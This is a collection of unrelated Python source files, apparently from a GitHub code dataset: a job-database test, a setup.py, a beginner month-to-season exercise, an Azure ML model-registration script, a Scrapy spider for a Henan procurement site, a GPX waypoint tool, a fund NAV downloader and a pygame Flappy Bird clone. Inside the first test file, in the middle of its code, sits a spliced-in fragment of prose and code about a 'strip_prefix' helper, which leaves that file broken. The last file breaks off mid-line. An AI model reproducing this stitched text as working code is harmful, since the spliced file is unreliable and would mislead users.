marieclancyProject1.get_jobs()\n marieclancyProject1.write_file(jobs)\n titleToExist = \"Web Full Stack Engineer\"\n match = False\n with open('jobs.txt', 'r') as fileOpen:\n for line in fileOpen.readlines():\n if titleToExist in line:\n match = True\n break\n assert match\n\n\ndef test_send_extra_data():\n conn, cursor = marieclancyProject1.open_db(\"test.sqlite\")\n marieclancyProject1.setup_db(cursor, conn)\n extraGoodData = {\n \"id\": \"781\", \"type\": \"yes\", \"url\": \"ok.com\", 'company': 'google',\n 'company_url': 'ok.com123',\n 'created_at': \"March 1, 2019\", 'location': \"USA\", 'title': 'senior designer',\n 'description': \"professional developer needed\",\n 'how_to_apply': \"please visit website\", 'company_logo': \"none\"}\n marieclancyProject1.insert_to_database(cursor, conn, extraGoodData)\n existingID = \"781\"\n cursor.execute(\"SELECT * FROM jobs WHERE jobs.id = ?\", (existingID,))\n assert cursor.fetchone()\n\n # same as above but with fewer arguments\n extraBadData = {\n \"id\": \"782\", \"type\": \"yes\", \"url\": \"ok.com\", 'company': 'google',\n 'title': 'senior designer',\n 'description': \"professional developer needed\",\n 'how_to_apply': \"please visit website\", 'company_logo': \"none\"}\n\n 
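The parametrized cases above pin down `strip_prefix` fairly tightly. One implementation consistent with every case — the real `devassistant.utils` may differ in details such as the error message:

import re

def strip_prefix(s, prefix, regex=False):
    if not isinstance(s, str) or not isinstance(prefix, str):
        raise TypeError('both arguments must be strings')
    if regex:
        m = re.match(prefix, s)                  # anchored at the start
        return s[m.end():] if m else s
    return s[len(prefix):] if s.startswith(prefix) else s

assert strip_prefix('foobar', 'foo') == 'bar'
assert strip_prefix('foobar', '[fo]*') == 'foobar'           # no regex by default
assert strip_prefix('foobar', '[fo]*', regex=True) == 'bar'
assert strip_prefix('foo', 'foobar') == 'foo'
# strip_suffix mirrors this with str.endswith and an end-anchored
# re.search('(?:%s)$' % pattern).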
nonExistingID = 782\n marieclancyProject1.insert_to_database(cursor, conn, extraBadData)\n cursor.execute(\"SELECT * FROM jobs WHERE jobs.id = ?\", (nonExistingID,))\n assert cursor.fetchone() is None\n\n marieclancyProject1.close_db(conn)\n","repo_name":"marieclancy2/mclancyJobsProject","sub_path":"Tests/testJobs.py","file_name":"testJobs.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23107310746","text":"#!/usr/bin/env python3\n\nfrom setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='crownstone-sdk',\n version=\"1.0.0\",\n packages=find_packages(exclude=[\"examples\",\"testing\"]),\n author=\"Crownstone B.V.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/crownstone/crownstone-python-sdk\",\n install_requires=list(package.strip() for package in open('requirements.txt')),\n scripts=[\n 'tools/cs_dfu_write_application',\n 'tools/cs_scan_any_crownstone',\n 'tools/cs_scan_for_alternative_state',\n 'tools/cs_scan_known_crownstones',\n 'tools/cs_switch_crownstone',\n 'tools/cs_microapp_enable',\n 'tools/cs_microapp_upload',\n 'tools/cs_microapp_message',\n 'tools/cs_setup_crownstone',\n 'tools/cs_factory_reset_crownstone',\n ],\n classifiers=[\n 'Programming Language :: Python :: 3.7'\n ],\n python_requires='>=3.7',\n)\n","repo_name":"crownstone/crownstone-python-sdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28606262627","text":"# 3) Пользователь вводит месяц в виде целого числа от 1 до 12. Сообщить к какому времени года\n# относится месяц (зима, весна, лето, осень). 
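`test_send_extra_data` above is the only specification we see for `insert_to_database`: a row carrying all eleven fields is inserted, while a row with missing fields is silently skipped. A sketch consistent with just that behaviour — the column order and the `INSERT OR IGNORE` conflict policy are guesses, not the project's code:

import sqlite3

REQUIRED = ('id', 'type', 'url', 'company', 'company_url', 'created_at',
            'location', 'title', 'description', 'how_to_apply', 'company_logo')

def insert_to_database(cursor, conn, job):
    if any(k not in job for k in REQUIRED):
        return                          # the extraBadData path: nothing inserted
    cursor.execute(
        'INSERT OR IGNORE INTO jobs VALUES (' + ','.join('?' * 11) + ')',
        tuple(job[k] for k in REQUIRED))
    conn.commit()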
Напишите решения через list и через dict.\n\nseasons_number = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\nseasons_time_year = {0: 'зима', 1: 'зима', 2: 'весна', 3: 'весна', 4: 'весна', 5: 'лето', 6: 'лето', 7: 'лето', 8: 'осень', 9: 'осень', 10: 'осень', 11: 'зима'}\nmonth = input('введите месяц пж: ')\ncount_attempts = 0\n\nwhile type(month) != int or count_attempts < 5:\n try:\n month = int(month)\n if month > 12 or month <= 0:\n print('такого месяц нет')\n raise Exception\n break\n except(ValueError, Exception):\n print('что-то не так')\n count_attempts += 1\n month = input('введите месяц пж: ')\n\nprint(seasons_time_year.get(seasons_number.index(month)))\n","repo_name":"egorgasa/for_you","sub_path":"lesson2/l3.py","file_name":"l3.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72796534521","text":"import sys\r\nimport os.path\r\nimport argparse\r\nfrom azureml.core import Workspace\r\nfrom azureml.core.model import Model\r\nfrom azureml.core.authentication import ServicePrincipalAuthentication\r\n\r\n\r\nPARSER = argparse.ArgumentParser()\r\nPARSER.add_argument('--AZUREML_RUN_TOKEN')\r\nPARSER.add_argument('--AZUREML_RUN_ID')\r\nPARSER.add_argument('--AZUREML_ARM_SUBSCRIPTION')\r\nPARSER.add_argument('--AZUREML_ARM_RESOURCEGROUP')\r\nPARSER.add_argument('--AZUREML_ARM_WORKSPACE_NAME')\r\nPARSER.add_argument('--AZUREML_ARM_PROJECT_NAME')\r\nPARSER.add_argument('--AZUREML_SCRIPT_DIRECTORY_NAME')\r\nPARSER.add_argument('--AZUREML_RUN_TOKEN_EXPIRY')\r\nPARSER.add_argument('--AZUREML_SERVICE_ENDPOINT')\r\nPARSER.add_argument('--MODEL_PATH')\r\nPARSER.add_argument('--MODEL_NAME')\r\nPARSER.add_argument('--TENANT_ID')\r\nPARSER.add_argument('--APP_ID')\r\nPARSER.add_argument('--APP_SECRET')\r\n\r\nARGS = PARSER.parse_args()\r\n\r\nTENANT_ID = ARGS.TENANT_ID\r\nAPP_ID = ARGS.APP_ID\r\nAPP_SECRET = ARGS.APP_SECRET\r\nWORKSPACE_NAME = ARGS.AZUREML_ARM_WORKSPACE_NAME\r\nSUBSCRIPTION_ID = ARGS.AZUREML_ARM_SUBSCRIPTION\r\nRESOURCE_GROUP = ARGS.AZUREML_ARM_RESOURCEGROUP\r\nMODEL_PATH = ARGS.MODEL_PATH\r\nMODEL_NAME = ARGS.MODEL_NAME\r\n\r\nif os.path.isfile(MODEL_PATH) is False:\r\n print(\"The given model path %s is invalid\" % (MODEL_PATH))\r\n sys.exit(1)\r\n\r\nSP_AUTH = ServicePrincipalAuthentication(\r\n tenant_id=TENANT_ID,\r\n service_principal_id=APP_ID,\r\n service_principal_password=APP_SECRET)\r\n\r\nWORKSPACE = Workspace.get(\r\n WORKSPACE_NAME,\r\n SP_AUTH,\r\n SUBSCRIPTION_ID,\r\n RESOURCE_GROUP\r\n)\r\n\r\ntry:\r\n MODEL = Model.register(\r\n model_path=MODEL_PATH,\r\n model_name=MODEL_NAME,\r\n description=\"Fashion MNIST\",\r\n workspace=WORKSPACE)\r\n\r\n print(\"Model registered successfully. 
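For the month-to-season exercise above (report the season for a month 1-12, solved once via list and once via dict), the list+dict pair can collapse into one arithmetic index: `month % 12 // 3` sends Dec/Jan/Feb to 0, Mar/Apr/May to 1, and so on. A compact alternative, keeping the Russian season names the task uses:

SEASONS = ('зима', 'весна', 'лето', 'осень')

def season_of(month: int) -> str:
    if not 1 <= month <= 12:
        raise ValueError('месяц должен быть от 1 до 12')
    return SEASONS[month % 12 // 3]    # 12 % 12 == 0, so December is winter

assert season_of(12) == 'зима' and season_of(3) == 'весна' and season_of(8) == 'лето'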
ID: \" + MODEL.id)\r\nexcept Exception as caught_error:\r\n print(\"Error while registering the model: \" + str(caught_error))\r\n sys.exit(1)\r\n","repo_name":"Azure-Samples/MLOpsDatabricks","sub_path":"aml_service/experiment/register_model.py","file_name":"register_model.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"40"} +{"seq_id":"40708833469","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@file :province_67_yangguangyizhao_spider.py\n@description :阳光易招公共资源交易平台\n@date :2021/05/31 10:21:05\n@author :miaokela\n@version :1.0\n\"\"\"\nimport scrapy\nimport re\nimport requests\nfrom lxml import etree\nfrom datetime import datetime\nimport random\nfrom collections import OrderedDict\n\nfrom spider_pro import items, constans, utils\n\n\nclass Province67YangguangyizhaoSpiderSpider(scrapy.Spider):\n name = 'province_67_yangguangyizhao_spider'\n allowed_domains = ['www.sunbidding.com']\n start_urls = ['http://www.sunbidding.com/']\n query_url = 'http://www.sunbidding.com'\n area_id = 67\n basic_area = '河南省-阳光易招公共资源交易平台'\n keywords_map = OrderedDict({\n '征求意见': '招标预告',\n '单一来源|询价': '招标公告',\n '资格审查': '资格预审结果公告',\n '澄清|变成|补充|取消|更正|延期': '招标变更',\n '流标|废标|终止|中止': '招标异常',\n '评标公示|候选人': '中标预告',\n '评审公示': '其他公告',\n })\n url_map = {\n '房建市政': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/jzbgg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jscqgg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jbggg/index.jhtml'},\n {'notice_type': '中标预告', 'url': 'http://www.sunbidding.com/jypbgs/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/jszbgg/index.jhtml'},\n ],\n '政府采购': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/zcggg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/zfcqgg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/zbggg/index.jhtml'},\n {'notice_type': '其他公告', 'url': 'http://www.sunbidding.com/zpsgs/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/zfzbgg/index.jhtml'},\n ],\n '企业采购': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/jqcgg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jqccq/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jqcbg/index.jhtml'},\n {'notice_type': '其他公告', 'url': 'http://www.sunbidding.com/jqcps/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/jqczb/index.jhtml'},\n ],\n '医疗卫生': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/yycggg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/yybggg/index.jhtml'},\n {'notice_type': '其他公告', 'url': 'http://www.sunbidding.com/yypsgs/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/yyzbgg/index.jhtml'},\n ],\n '交通': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/jjtzb/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jjtbg/index.jhtml'},\n {'notice_type': '中标预告', 'url': 'http://www.sunbidding.com/jjtpb/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/jjtjg/index.jhtml'},\n ],\n '水利': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/jslzb/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jslbg/index.jhtml'},\n {'notice_type': '中标预告', 'url': 'http://www.sunbidding.com/jslpb/index.jhtml'},\n {'notice_type': 
'中标公告', 'url': 'http://www.sunbidding.com/jsljg/index.jhtml'},\n ]\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__()\n self.start_time = kwargs.get('sdt', '')\n self.end_time = kwargs.get('edt', '')\n\n @staticmethod\n def get_headers(resp):\n default_headers = resp.request.headers\n headers = {k: random.choice(v) if all([isinstance(v, list), v]) else v for k, v in default_headers.items()}\n return headers\n\n def judge_in_interval(self, url, method='GET', resp=None, ancestor_el='table', ancestor_attr='id', ancestor_val='',\n child_el='tr', time_sep='-', doc_type='html', **kwargs):\n \"\"\"\n 判断最末一条数据是否在区间内\n Args:\n resp: scrapy请求响应\n url: 分页链接\n method: 请求方式\n ancestor_el: 祖先元素\n ancestor_attr: 属性\n ancestor_val: 属性值\n child_el: 子孙元素\n time_sep: 时间中间分隔符 默认:-\n doc_type: 文档类型\n **kwargs:\n @data: POST请求体\n @enhance_els: 扩展xpath匹配子节点细节['table', 'tbody'] 连续节点\n Returns:\n status: 结果状态\n 1 首条在区间内 可抓、可以翻页\n 0 首条不在区间内 停止翻页\n 2 末条大于最大时间 continue\n \"\"\"\n proxy = resp.meta.get('proxy', None)\n proxies = None\n if proxy:\n if proxy.startswith('https'):\n proxies = {\n 'https': proxy,\n }\n else:\n proxies = {\n 'http': proxy,\n }\n status = 0\n headers = Province67YangguangyizhaoSpiderSpider.get_headers(resp)\n if all([self.start_time, self.end_time]):\n try:\n text = ''\n if method == 'GET':\n text = requests.get(url=url, headers=headers, proxies=proxies if proxies else None).text\n if method == 'POST':\n text = requests.post(url=url, data=kwargs.get(\n 'data'), headers=headers, proxies=proxies if proxies else None).text\n if text:\n els = []\n if doc_type == 'html':\n doc = etree.HTML(text)\n\n # enhance_els\n enhance_els = kwargs.get('enhance_els', [])\n\n enhance_condition = ''\n if enhance_els:\n for enhance_el in enhance_els:\n enhance_condition += '/{0}'.format(enhance_el)\n\n _path = '//{ancestor_el}[@{ancestor_attr}=\"{ancestor_val}\"]{enhance_condition}//{child_el}[last()]/text()[not(normalize-space()=\"\")]'.format(\n **{\n 'ancestor_el': ancestor_el,\n 'ancestor_attr': ancestor_attr,\n 'ancestor_val': ancestor_val,\n 'child_el': child_el,\n 'enhance_condition': enhance_condition\n })\n els = doc.xpath(_path)\n if doc_type == 'xml':\n doc = etree.XML(text)\n _path = '//{child_el}/text()'.format(**{\n 'child_el': child_el,\n })\n els = doc.xpath(_path)\n if els:\n first_el = els[0]\n final_el = els[-1]\n\n # 解析出时间\n t_com = re.compile(r'(\\d+%s\\d+%s\\d+)' %\n (time_sep, time_sep))\n\n first_pub_time = t_com.findall(first_el)\n final_pub_time = t_com.findall(final_el)\n\n if all([first_pub_time, final_pub_time]):\n first_pub_time = datetime.strptime(\n first_pub_time[0], '%Y{0}%m{1}%d'.format(\n time_sep, time_sep)\n )\n final_pub_time = datetime.strptime(\n final_pub_time[0], '%Y{0}%m{1}%d'.format(\n time_sep, time_sep)\n )\n start_time = datetime.strptime(\n self.start_time, '%Y-%m-%d')\n end_time = datetime.strptime(\n self.end_time, '%Y-%m-%d')\n # 比最大时间大 continue\n # 比最小时间小 break\n # 1 首条在区间内 可抓、可以翻页\n # 0 首条不在区间内 停止翻页\n # 2 末条大于最大时间 continue\n if first_pub_time < start_time:\n status = 0\n elif final_pub_time > end_time:\n status = 2\n else:\n status = 1\n except Exception as e:\n self.logger.info(e)\n else:\n status = 1 # 没有传递时间\n return status\n\n def match_title(self, title_name):\n \"\"\"\n 根据标题匹配关键字 返回招标类别\n Args:\n title_name: 标题\n\n Returns:\n notice_type: 招标类别\n \"\"\"\n matched = False\n notice_type = ''\n for keywords, value in self.keywords_map.items():\n if re.search(keywords, title_name):\n notice_type = value\n matched = True\n break\n return 
matched, notice_type\n\n def start_requests(self):\n for category_type, urls_data in self.url_map.items():\n for url_data in urls_data:\n url = url_data['url']\n notice_type = url_data['notice_type']\n\n yield scrapy.Request(url=url, callback=self.get_max_page, meta={\n 'category_type': category_type,\n 'notice_type': notice_type\n }, cb_kwargs={\n 'url': url,\n })\n\n def get_max_page(self, resp, url):\n \"\"\"\n 获取总页数\n \"\"\"\n page_string = resp.xpath('//div[@class=\"TxtCenter\"]/div/text()[1]').get().strip()\n max_page_com = re.compile(r'/(\\d+)页') # 共1169条记录 1/65页\n max_pages = max_page_com.findall(page_string)\n if max_pages:\n max_page = max_pages[0]\n try:\n max_page = int(max_page)\n except ValueError as e:\n self.log(e)\n else:\n for page in range(1, max_page + 1):\n c_url = url.replace('index', 'index_{0}'.format(page)) if page > 1 else url\n # 最末一条符合时间区间则翻页\n # 解析详情页时再次根据区间判断去采集\n judge_status = self.judge_in_interval(\n c_url, method='GET', ancestor_el='div', ancestor_attr='class', ancestor_val='infolist-main',\n child_el='em', resp=resp,\n )\n if judge_status == 0:\n break\n elif judge_status == 2:\n continue\n else:\n yield scrapy.Request(url=c_url, callback=self.parse_list, meta={\n 'notice_type': resp.meta.get('notice_type', ''),\n 'category_type': resp.meta.get('category_type', '')\n }, priority=max_page - page, dont_filter=True)\n\n def parse_list(self, resp):\n \"\"\"\n 获取详情页链接与发布时间\n \"\"\"\n els = resp.xpath('//div[@class=\"infolist-main\"]//a')\n for n, el in enumerate(els):\n href = el.xpath(\"./@href\").get()\n if href:\n pub_time = el.xpath(\"./em/text()\").get()\n url = ''.join([self.query_url, href])\n if utils.check_range_time(self.start_time, self.end_time, pub_time)[0]:\n yield scrapy.Request(url=url, callback=self.parse_detail, meta={\n 'notice_type': resp.meta.get('notice_type'),\n 'category_type': resp.meta.get('category_type'),\n 'pub_time': pub_time,\n }, priority=(len(els) - n) * 1000)\n\n def parse_detail(self, resp):\n content = resp.xpath('//div[@class=\"s_content\"]').get()\n title_name = resp.xpath('//h2/text()').get()\n notice_type_ori = resp.meta.get('notice_type')\n\n # _, content = utils.remove_specific_element(content, 'a', 'href', 'javascript:window.close()')\n\n # 关键字重新匹配 notice_type\n matched, match_notice_type = self.match_title(title_name)\n if matched:\n notice_type_ori = match_notice_type\n\n notice_types = list(\n filter(lambda k: constans.TYPE_NOTICE_DICT[k] == notice_type_ori, constans.TYPE_NOTICE_DICT)\n )\n\n # 匹配文件\n _, files_path = utils.catch_files(content, self.query_url, resp=resp)\n\n notice_item = items.NoticesItem()\n notice_item[\"origin\"] = resp.url\n\n notice_item[\"title_name\"] = title_name.strip() if title_name else ''\n notice_item[\"pub_time\"] = resp.meta.get('pub_time')\n\n notice_item[\"info_source\"] = self.basic_area\n notice_item[\"is_have_file\"] = constans.TYPE_HAVE_FILE if files_path else constans.TYPE_NOT_HAVE_FILE\n notice_item[\"files_path\"] = files_path\n notice_item[\"notice_type\"] = notice_types[0] if notice_types else constans.TYPE_UNKNOWN_NOTICE\n notice_item[\"content\"] = content\n notice_item[\"area_id\"] = self.area_id\n notice_item[\"category\"] = resp.meta.get('category_type')\n print(resp.meta.get('pub_time'), resp.url)\n\n return notice_item\n\n\nif __name__ == \"__main__\":\n from scrapy import cmdline\n\n cmdline.execute(\n \"scrapy crawl province_67_yangguangyizhao_spider -a sdt=2021-08-09 -a edt=2021-08-09\".split(\" \")\n )\n # cmdline.execute(\"scrapy crawl 
province_67_yangguangyizhao_spider\".split(\" \"))\n","repo_name":"LC-123456-git/ztc_spider","sub_path":"spider_pro/spiders/province_67_yangguangyizhao_spider.py","file_name":"province_67_yangguangyizhao_spider.py","file_ext":"py","file_size_in_byte":14627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42421118004","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\n\nimport os\n\nfrom gps.lib.formats.GpxParser import GpxParser\nfrom gps.lib.gpsObserver import GpxObserver\n\nfrom gps.lib.formats.gpxWriter import gpxWriter\n\n\nclass WaypointDB(object):\n \"\"\"\n Models dir structure of waypoints with a directory\n which is its distance threshold, e.g:\n\n ~/GPS_Tracks/Waypoints/10/pubs.gpx\n ~/GPS_Tracks/Waypoints/20/cafes.gpx\n \"\"\"\n\n # ~/GPS_Tracks/Waypoints\n\n def __init__(self):\n self.base_directory = os.path.join(os.path.expanduser(\"~\"), \"GPS_Tracks\", \"Waypoints\")\n\n self.wps = []\n\n self.scan_directory(self.base_directory)\n\n def scan_directory(self, base_directory):\n\n for dirpath, dirnames, filenames in os.walk(base_directory):\n for filename in filenames:\n if os.path.splitext(filename)[1] == \".gpx\":\n self.add_file(os.path.join(dirpath, filename),\n os.path.basename(dirpath))\n\n def add_file(self, filename, distance):\n self.wps.append([filename, int(distance)])\n\n def get(self):\n for wp in self.wps:\n yield wp\n\n\nif __name__ == \"__main__\":\n\n \"\"\"\n Dump all the waypoints out as a single gpx file to stdout\n \"\"\"\n\n class WaypointObserver(GpxObserver):\n\n def __init__(self):\n super(WaypointObserver, self).__init__()\n self.gpx = gpxWriter()\n\n def nextWayPoint(self, point):\n super(WaypointObserver, self).nextWayPoint(point)\n self.gpx.writeItem(point)\n\n def end(self):\n super(WaypointObserver, self).end()\n self.gpx.close()\n\n wdb = WaypointDB()\n\n o = WaypointObserver()\n app = GpxParser(o)\n\n from gps.lib.logWriter import LogWriter\n log = LogWriter()\n\n files = [x[0] for x in wdb.get()]\n\n # Print the waypoints\n app.Parse(files)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jhilling/gps","sub_path":"gps/lib/gpxWaypointDB.py","file_name":"gpxWaypointDB.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29656564968","text":"import requests\nimport pandas as pd\nimport os.path\nimport logging\n\nurl_of = 'http://stock.finance.sina.com.cn/fundInfo/api/openapi.php/CaihuiFundInfoService.getNav'\n\nclass OpenFundTSLoaderSinaMixin( object ):\n\n def writeLocalData( self, dataDf ):\n \"\"\"\n Write to local cache in CSV format\n \"\"\"\n dataDf.to_csv( os.path.join(self.localPrefix, '%s.csv' % self.fundCode ) )\n\n def getDataFromWeb( self, missingDates ):\n \"\"\"\n Download fund NAV data from Sina Finance via HTTP request\n \"\"\"\n\n if not missingDates:\n return pd.DataFrame()\n\n firstDate = str( min(missingDates).date() )\n lastDate = str( max(missingDates).date() )\n\n\n res = requests.post( url_of, data = { 'symbol' : self.fundCode, \n 'datefrom' : firstDate, \n 'dateto' : lastDate, \n } )\n if res.ok:\n logging.debug( \"%s:Start downloading fund data \", self.fundCode )\n dataJson = res.json().get( 'result' ).get( 'data' )\n totalLen = int( dataJson.get( 'total_num' ) )\n if totalLen == 0:\n logging.debug( \"No data found for %s, Skip.\", self.fundCode )\n return pd.DataFrame()\n data = dataJson.get( 'data' )\n currLen = len( data )\n\n pageNum = 2\n while 
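The heart of the spider's `match_title` above is first-match-wins regex classification over an ordered map; it is isolated below with two of the spider's patterns. Note the source's variation pattern reads '澄清|变成|补充|…', where '变成' ('become') is presumably a typo for '变更' ('modification'); the sketch uses the corrected form:

import re
from collections import OrderedDict

KEYWORDS = OrderedDict({
    '澄清|变更|补充|取消|更正|延期': '招标变更',
    '流标|废标|终止|中止': '招标异常',
})

def classify(title, default=''):
    for pattern, notice_type in KEYWORDS.items():
        if re.search(pattern, title):
            return notice_type          # earlier, more specific patterns win
    return default

assert classify('某项目更正公告') == '招标变更'
assert classify('某项目终止公告') == '招标异常'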
currLen < totalLen:\n res = requests.post( url_of, data = { 'symbol' : self.fundCode, \n 'datefrom' : firstDate, \n 'dateto' : lastDate, \n 'page' : str( pageNum )\n } )\n dataJson = res.json().get( 'result' ).get( 'data' )\n data += dataJson.get( 'data' )\n\n currLen = len(data)\n pageNum += 1\n\n dataDf = pd.DataFrame.from_dict( data ).astype( { 'jjjz' : float, 'ljjz' : float } )\n dataDf[ 'fbrq' ] = pd.to_datetime( dataDf[ 'fbrq' ] )\n dataDf.rename( columns = { 'fbrq' : 'Date', 'jjjz' : 'NAV', 'ljjz' : 'ACC_NAV' }, inplace = True )\n dataDf[ 'Date' ] = dataDf[ 'Date' ].apply( pd.Timestamp )\n dataDf = dataDf[ dataDf[ 'Date' ].isin( missingDates ) ]\n dataDf.set_index( 'Date', inplace = True )\n logging.debug( \"%s:Downloaded %d records of fund NAVs.\", self.fundCode, len( dataDf ) )\n return dataDf\n else:\n return pd.DataFrame()\n","repo_name":"joshualee155/FundOptimizer","sub_path":"fundopt/openfundtsloadermixin.py","file_name":"openfundtsloadermixin.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"3496739928","text":"#!/usr/bin/env python3\n# O programa deseja feliz aniversário a alguém.\n\nage = 23\n\n# Essa linha gera um - TypeError: must be str, not int\n# message = \"Happy \" + age + \"rd Birthday!\"\n\n# Para representar valores que não são strings como strings:\nmessage = \"Happy \" + str(age) + \"rd Birthday!\"\n\nprint(message)\n","repo_name":"ranog/python_work","sub_path":"capitulo_02-Variaveis_e_tipos_de_dados_simples/birthday.py","file_name":"birthday.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29093327389","text":"import pygame\nfrom random import randint\n\n\nclass Cano(pygame.sprite.Sprite):\n def __init__(self, *groups):\n super().__init__(*groups)\n\n tamanho = randint(270, 480)\n\n self.image = pygame.image.load('data/pipe-green.png')\n self.image = pygame.transform.scale(self.image, (70, 300))\n self.rect = pygame.rect.Rect(570, tamanho, 70, 300)\n\n def update(self, *args):\n\n self.rect.x -= 5\n\n\nclass Cano_top(pygame.sprite.Sprite):\n def __init__(self, *groups, x=0):\n super().__init__(*groups)\n\n\n self.image = pygame.image.load('data/pipe-green.png')\n self.image = pygame.transform.scale(self.image, (70, 400))\n self.image = pygame.transform.flip(self.image, False, True)\n self.rect = pygame.rect.Rect(570, x, 70, 300)\n\n def update(self, *args):\n self.rect.x -= 5\n\n\nclass Bird(pygame.sprite.Sprite):\n def __init__(self, *groups):\n super().__init__(*groups)\n\n self.image = pygame.image.load('data/yellowbird.png')\n self.image = pygame.transform.scale(self.image, (35, 35))\n self.rect = pygame.rect.Rect(50, 315, 50, 50)\n\n def update(self, *args):\n key = pygame.key.get_pressed()\n\n if key == pygame.K_a:\n print('apertou 1')\n\n\nclass Conf(pygame.sprite.Sprite):\n def __init__(self, *groups):\n super().__init__(*groups)\n\n self.image = pygame.image.load('data/conf_bot.png')\n self.image = pygame.transform.scale(self.image, (35, 35))\n self.rect = pygame.rect.Rect(460, 590, 50, 50)\n\nclass Back(pygame.sprite.Sprite):\n def __init__(self, *groups):\n super().__init__(*groups)\n\n self.image = pygame.image.load('data/back.png')\n self.image = pygame.transform.scale(self.image, (35, 35))\n self.rect = pygame.rect.Rect(10, 590, 50, 50)\n\n\nclass Mouse(pygame.sprite.Sprite):\n def __init__(self, *groups):\n super().__init__(*groups)\n\n 
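The Sina loader above pages through results by re-POSTing with an incremented `page` number until the accumulated rows reach `total_num`. The loop's shape, separated from HTTP so it can be tested directly (a real client should also break on an empty page, as here, in case the server under-delivers):

def fetch_all(post_page, total_key='total_num', rows_key='data'):
    page, rows, total = 1, [], None
    while total is None or len(rows) < total:
        payload = post_page(page)        # caller wraps requests.post(url_of, ...)
        total = int(payload[total_key])
        batch = payload[rows_key]
        if total and not batch:
            break                        # guard against an endless loop
        rows += batch
        page += 1
    return rows

fake = {1: {'total_num': 3, 'data': [1, 2]}, 2: {'total_num': 3, 'data': [3]}}
assert fetch_all(lambda p: fake[p]) == [1, 2, 3]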
self.image = pygame.image.load('data/mouse.png')\n self.image = pygame.transform.scale(self.image, (15, 20))\n self.rect = pygame.rect.Rect(10, 590, 15, 20)\n\n def update(self, *args):\n\n self.rect = pygame.mouse.get_pos()\n#tela\npygame.init()\naltura = 630\nlargura = 500\ngameloop = True\nclock = pygame.time.Clock()\ntime = 0\ngameover = False\ngamestart = False\n\nscreen = pygame.display.set_mode((largura, altura))\n\nicon = pygame.image.load('data/yellowbird.png')\n\npygame.display.set_icon(icon)\npygame.display.set_caption('flappy bird')\n\n\n#fundo\nfundo = pygame.image.load('data/background-day.png')\nfundo = pygame.transform.scale(fundo, (largura, altura))\n\ngameover_png = pygame.image.load('data/gameover.png')\ngameover_png = pygame.transform.scale(gameover_png, (300, 100))\n\nstart_png = pygame.image.load('data/start.png')\nstart_png = pygame.transform.scale(start_png, (300, 500))\n\n#chao\nchao1 = pygame.image.load('data/base.png')\nchao1 = pygame.transform.scale(chao1, (500, 100))\nchao1_x = -250\nchao1_y = altura - 100\n\nchao2 = pygame.image.load('data/base.png')\nchao2 = pygame.transform.scale(chao2, (500, 100))\nchao2_x = 250\nchao2_y = altura - 100\n\n\n#personagens\nbird_group = pygame.sprite.Group()\nbird = Bird(bird_group)\n\nmovement =0\ngravity = 0.25\n\n#cano\ncanoGroup = pygame.sprite.Group()\n\n#placar\nplacar_time = 0\nplacar = 0\n\n\nbase_font = pygame.font.Font(None, 70)\n\nbase_font_regame = pygame.font.Font(None, 40)\n\nbase_font_placar_gameover = pygame.font.Font(None, 200)\n\n\n#conf\nconfGroup = pygame.sprite.Group()\nconf = Conf(confGroup)\nconf_tela = False\n\nbackGroup = pygame.sprite.Group()\nback = Back(backGroup)\n\nfundo_conf = pygame.image.load('data/fundo_conf.png')\nfundo_conf = pygame.transform.scale(fundo_conf, (largura, altura))\n\nbase_font_conf = pygame.font.Font(None, 30)\n\n\n\n#mouse\nmouseGroup = pygame.sprite.Group()\nmouse = Mouse(mouseGroup)\n\npygame.mouse.set_visible(False)\n\n\n#musicas\n\ncoxa = 'music/Hino do 